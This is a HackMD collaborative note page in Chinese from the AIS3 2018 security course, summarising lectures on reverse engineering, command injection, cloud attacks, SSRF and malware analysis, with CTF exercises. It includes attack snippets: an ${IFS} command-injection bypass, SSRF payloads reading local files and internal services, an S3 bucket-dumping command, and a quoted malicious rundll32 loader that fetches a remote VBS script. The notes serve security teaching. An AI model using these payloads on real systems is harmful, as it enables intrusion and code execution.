or
or
By clicking below, you agree to our terms of service.
New to HackMD? Sign up
Syntax | Example | Reference | |
---|---|---|---|
# Header | Header | 基本排版 | |
- Unordered List |
|
||
1. Ordered List |
|
||
- [ ] Todo List |
|
||
> Blockquote | Blockquote |
||
**Bold font** | Bold font | ||
*Italics font* | Italics font | ||
~~Strikethrough~~ | |||
19^th^ | 19th | ||
H~2~O | H2O | ||
++Inserted text++ | Inserted text | ||
==Marked text== | Marked text | ||
[link text](https:// "title") | Link | ||
 | Image | ||
`Code` | Code |
在筆記中貼入程式碼 | |
```javascript var i = 0; ``` |
|
||
:smile: | ![]() |
Emoji list | |
{%youtube youtube_id %} | Externals | ||
$L^aT_eX$ | LaTeX | ||
:::info This is a alert area. ::: |
This is a alert area. |
On a scale of 0-10, how likely is it that you would recommend HackMD to your friends, family or business associates?
Please give us some advice and help us improve HackMD.
Syncing
xxxxxxxxxx
AIS3 2018 南區共筆
官方網站 : https://ais3.org/
聊天室 : https://bit.ly/2OoISSS ←看到最後
/*https://tlk.io/ais3-2018*/
北區共筆 : https://bit.ly/2uZ1zVg
中區共筆 : https://bit.ly/2OoISSS
7/30 (一) 14:00 - 17:00
LAB 0-1 Payment Fraud
LAB 0-2 Anomaly Detection
Symbolists 符號理論學派
LAB 1-2 Malware Classification
Analogizers 類比推理學派
Lab 2-1 Linear Regression
Bayesians 貝氏定理學派
LAB 3-1 Spam Filter
../
Evolutionaries 演化論學派
Connectionists 類神經網路學派
Principle Component Analysis (PCA)
LAB 6-1 XSS Detection
7/31 (二) 09:30 - 12:30
7/31 (二) 14:00 - 17:00
講師 : Asuka Nakajima NTT
Reverse Engineering Dojo: Enhancing Assembly Reading Skills
Ultimate goal: Human Decompiler
x86 Assembly basic
C++ RE basic
8/1 (三) 09:30 - 12:30
8/1 (三) 14:00 - 17:00
軟體安全分析
8/2 (四) 09:30 - 12:30
講師 : 王歆綺 資策會
遠端注入與無檔案式攻擊技術
線上convert
xxd (
XXD將7檔案 用blockow.cmd變成shellcode之後(指令:blockow.cmd 7 會生成shellcode檔案)
用IDA 和 Ollydbg打開shellcode檔案
發現sub_401088 function 在call windows API (5f327377h等)
在sub_401088 function內 找出 call ebp的address 然後到ollydbg 下斷點 共有 3個call ebp 和 40107f的jmp eax
然後多按幾次f9執行 會看到jmp eax那行 後面有個灰色的字 寫那個library的名字 找到ws2_32.bind 這個 library 再去找他的IP
去google bind的windows API 會看到如簡報上所看到的code
相關的參數會在堆疊上照順序存放
看到push一堆數字 就要懷疑是windows API
然後又call ebp所以可能是執行API
許多API在執行時需要參數 所以要看stack內容 才知道參數(listen port 等)
資安高峰會的openEMR漏洞解析
8/2 (四) 14:00 - 17:00
講師 : 劉作仁 安華聯網
連網裝置安全檢測

Command injection
http://10.103.10.182/dvwa
pentestmonkey
command injection 最常用的指令 reboot…可以很快知道該指令有沒有被執行成功
可用 ${IFS} 代替空白 <– 要大寫(Internal Field Separator的縮寫)
發現弱點
繞過限制
取得控制介面
Source:https://www.offensive-security.com/metasploit-unleashed/msfvenom/
8/3 (五) 09:30 - 12:30
1.看服務供應商手冊
2.覺得雲端很安全
3.告訴老闆客戶我們很安全
其他可以考慮的議題
1. 浮動IP範圍
2. 服務是否暴露在PUBLIC環境
3. 系統弱點如何被patch的
4. 入侵系統後還能做什麼?
5. 網路架構是怎麼一回事?
6. 應用架構特性差異
雲端環境的差異
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Learn More →(怕被吉(告)的話請投到HITCON zeroday)
EDOS

資訊蒐集
IP列舉
網域列舉
資訊蒐集
(AIS3網站有藏很多flag,但是都沒人找到,管理人表示他很傷心QQ)
DNS相關攻擊
繞過CDN
為什麼要繞過?
有WAF
繞過CDN
DDOS就打的到?
容易Debug
額外的注入機會
AP通常是如何獲取使用者IP?
使用CDN的AP要如何獲取真實IP?
怎麼繞過
如何正確使用CDN
練習題1
https://realme.0x61697333.cf (一個flag)
http://a???t.0x61697333.cf (1個flag)<–好像比較簡單(?
http://ais3secret.0x61697333.cf/
題解



1.用Virustotal搜尋https://realme.0x61697333.cf 網址
2.使用Chrome插件Modify Headers修改Headers
3.再訪問http://52.194.38.175/即得旗子:)
Cloud Storage Service
最常見的安全問題
AWS S3
Bucket Name具有唯一性
網址格式
python AWSBucketDump.py -l 字典檔 -g 關鍵字 -D…QQ -m 檔案尺寸限制 -t 執行緒
練習題2
s3 bucket有一個ais3相關的bucket(1個flag)
http://gallery.0x61697333.cf (2個flag)(亂碼的話 這站是UTF8)
Hint
Load Balancer
ex:consul這服務探索
AMI Market
那個神祕的主系統…
網路控管
SSRF 伺服器端服務請求偽造
SSRF的攻擊面
什麼地方會出現SSRF?
神奇服務
運行方法
多多尋找8050, 5023port
練習3
* file:///etc/nginx/sites-enabled/default
* file:///meow/ais3/index.php
* http://0:9200/_search
-http://0//(?)
dig 8.8.8.8.nip.io
解析不一致(一個網址各自表述)
什麼是MetaData的IP位置?
WeirdAAL (AWS Attack Library)
專門設計來攻擊AWS Service
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Learn More →.env 補上 aws_session_token = <insert token>
練習4
http://ssrf10.0x61697333.cf (3個flag)
南區-討論區
8/3 (五) 14:00 - 17:00
8/4 (六) 09:30 - 12:30
講師 : Anthony Lai VXRL
Target Attack Analysis and Incident Response
https://drive.google.com/drive/folders/1Lyo3I0DkvOxfHhKno2mzt0cHNcDwEfWg
material: https://goo.gl/XFubKq
apktool
hydra暴力破解 (kali 內建工具)
鑑識工具 Volatility
Bonus Lab
<param name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();try{GetObject("script:http://www.kvtester.com/g6dfha.vbs");}catch(e){}'>
%appdata%\microsoft.exe
sans malware analysis cheat sheet
remnux
cuckoo Sandbox
分析惡意檔案時記得在自有環境分析就好,不要甚麼檔案都丟到線上分析工具,因為怕會順便把私人資訊也上傳到分析網站(ex:個人帳戶…)
Invoke-Obfuscation 工具
regexr 可以練習正規表達式
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Learn More →- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Learn More →- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Learn More →:metal:
我很需要七天輪迴來消化消化

或是 za warudo!
8/4 (六) 14:00 - 17:00
VM密碼:nctu
VM
行動網路特性
標準 3GPP
讓你帳單爆掉的四大方法
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Learn More →- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Learn More →IPSec
VoLTE可能安全威脅
https://hackmd.io/n8S73GHzTl6A3OAcCAyBFg#
實作一
CS Gateway未來會被PS Gateway取代
SIP 標準 - RFC3428
- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Learn More →Welcome!!
Image Not Showing
Possible Reasons

- The image file may be corrupted
- The server hosting the image is unavailable
- The image path is incorrect
- The image format is not supported
Learn More →